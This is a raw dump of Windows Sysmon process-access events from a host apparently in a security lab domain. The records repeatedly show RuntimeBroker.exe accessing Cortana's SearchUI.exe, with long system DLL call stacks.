|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 